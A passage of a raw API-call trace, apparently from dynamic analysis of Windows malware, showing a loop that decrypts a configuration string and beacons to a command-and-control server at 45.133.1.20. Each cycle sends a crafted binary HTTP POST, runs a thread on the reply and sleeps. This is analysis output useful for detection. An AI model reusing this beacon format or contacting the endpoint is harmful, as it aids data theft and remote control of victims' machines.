0x74810000 [0216.393] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0216.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.394] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.395] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.395] GetProcessHeap () returned 0x6a0000 [0216.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0216.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.398] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0216.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.399] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0216.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.400] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0216.401] GetProcessHeap () returned 0x6a0000 [0216.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.402] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0216.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0216.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0216.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.405] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0216.405] GetProcessHeap () returned 0x6a0000 [0216.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0216.405] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0216.405] GetProcessHeap () returned 0x6a0000 [0216.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0216.405] socket (af=2, type=1, protocol=6) returned 0x620 [0216.406] connect (s=0x620, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0216.430] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0216.430] GetProcessHeap () returned 0x6a0000 [0216.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0216.430] GetProcessHeap () returned 0x6a0000 [0216.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0216.431] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.432] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.432] GetProcessHeap () returned 0x6a0000 [0216.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0216.432] GetProcessHeap () returned 0x6a0000 [0216.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.433] GetProcessHeap () returned 0x6a0000 [0216.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0216.433] GetProcessHeap () returned 0x6a0000 [0216.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0216.434] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.434] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.434] GetProcessHeap () returned 0x6a0000 [0216.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0216.435] GetProcessHeap () returned 0x6a0000 [0216.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.435] send (s=0x620, buf=0x6b5c98*, len=242, flags=0) returned 242 [0216.436] send (s=0x620, buf=0x6bb998*, len=159, flags=0) returned 159 [0216.436] GetProcessHeap () returned 0x6a0000 [0216.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0216.436] recv (in: s=0x620, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0216.518] GetProcessHeap () returned 0x6a0000 [0216.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0216.518] GetProcessHeap () returned 0x6a0000 [0216.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0216.519] GetProcessHeap () returned 0x6a0000 [0216.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0216.519] GetProcessHeap () returned 0x6a0000 [0216.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0216.519] closesocket (s=0x620) returned 0 [0216.520] GetProcessHeap () returned 0x6a0000 [0216.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0216.520] GetProcessHeap () returned 0x6a0000 [0216.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0216.520] GetProcessHeap () returned 0x6a0000 [0216.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0216.521] GetProcessHeap () returned 0x6a0000 [0216.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0216.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x900) returned 0x620 [0216.523] Sleep (dwMilliseconds=0xea60) [0216.525] GetProcessHeap () returned 0x6a0000 [0216.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0216.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.526] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.532] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0216.538] GetProcessHeap () returned 0x6a0000 [0216.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0216.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.539] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0216.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.540] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.541] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.541] GetProcessHeap () returned 0x6a0000 [0216.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0216.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.543] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0216.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.545] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0216.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.546] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0216.546] GetProcessHeap () returned 0x6a0000 [0216.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.546] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.547] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.549] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.550] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.550] GetProcessHeap () returned 0x6a0000 [0216.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0216.550] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.551] GetProcessHeap () returned 0x6a0000 [0216.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0216.551] GetProcessHeap () returned 0x6a0000 [0216.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0216.551] GetProcessHeap () returned 0x6a0000 [0216.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0216.552] GetProcessHeap () returned 0x6a0000 [0216.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0216.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0216.595] GetProcessHeap () returned 0x6a0000 [0216.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0216.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.596] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0216.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.597] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.598] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.598] GetProcessHeap () returned 0x6a0000 [0216.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0216.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.600] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0216.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.601] CryptDestroyKey (hKey=0x6ad020) returned 1 [0216.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.604] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0216.604] GetProcessHeap () returned 0x6a0000 [0216.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.606] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0216.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.607] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0216.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.608] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0216.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.609] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0216.609] GetProcessHeap () returned 0x6a0000 [0216.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0216.610] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0216.610] GetProcessHeap () returned 0x6a0000 [0216.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0216.610] socket (af=2, type=1, protocol=6) returned 0x624 [0216.610] connect (s=0x624, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0216.664] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0216.664] GetProcessHeap () returned 0x6a0000 [0216.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0216.664] GetProcessHeap () returned 0x6a0000 [0216.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0216.666] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.667] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.667] GetProcessHeap () returned 0x6a0000 [0216.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0216.667] GetProcessHeap () returned 0x6a0000 [0216.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.669] GetProcessHeap () returned 0x6a0000 [0216.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0216.669] GetProcessHeap () returned 0x6a0000 [0216.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0216.672] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.673] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.673] GetProcessHeap () returned 0x6a0000 [0216.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0216.673] GetProcessHeap () returned 0x6a0000 [0216.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.674] send (s=0x624, buf=0x6b5c98*, len=242, flags=0) returned 242 [0216.675] send (s=0x624, buf=0x6bb998*, len=159, flags=0) returned 159 [0216.675] GetProcessHeap () returned 0x6a0000 [0216.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0216.675] recv (in: s=0x624, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0216.787] GetProcessHeap () returned 0x6a0000 [0216.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0216.788] GetProcessHeap () returned 0x6a0000 [0216.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0216.788] GetProcessHeap () returned 0x6a0000 [0216.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0216.789] GetProcessHeap () returned 0x6a0000 [0216.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0216.789] closesocket (s=0x624) returned 0 [0216.790] GetProcessHeap () returned 0x6a0000 [0216.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0216.791] GetProcessHeap () returned 0x6a0000 [0216.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0216.791] GetProcessHeap () returned 0x6a0000 [0216.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0216.792] GetProcessHeap () returned 0x6a0000 [0216.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0216.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x458) returned 0x624 [0216.802] Sleep (dwMilliseconds=0xea60) [0216.805] GetProcessHeap () returned 0x6a0000 [0216.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0216.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.807] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0216.826] GetProcessHeap () returned 0x6a0000 [0216.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0216.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.834] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0216.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.835] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.836] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.836] GetProcessHeap () returned 0x6a0000 [0216.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0216.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.838] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0216.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.840] CryptDestroyKey (hKey=0x6ad020) returned 1 [0216.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.841] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0216.841] GetProcessHeap () returned 0x6a0000 [0216.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.842] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.843] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.844] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.844] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.844] GetProcessHeap () returned 0x6a0000 [0216.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0216.845] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.845] GetProcessHeap () returned 0x6a0000 [0216.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0216.846] GetProcessHeap () returned 0x6a0000 [0216.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0216.846] GetProcessHeap () returned 0x6a0000 [0216.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0216.846] GetProcessHeap () returned 0x6a0000 [0216.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0216.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0216.861] GetProcessHeap () returned 0x6a0000 [0216.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0216.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.865] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0216.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.866] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.867] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.867] GetProcessHeap () returned 0x6a0000 [0216.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0216.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.869] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, 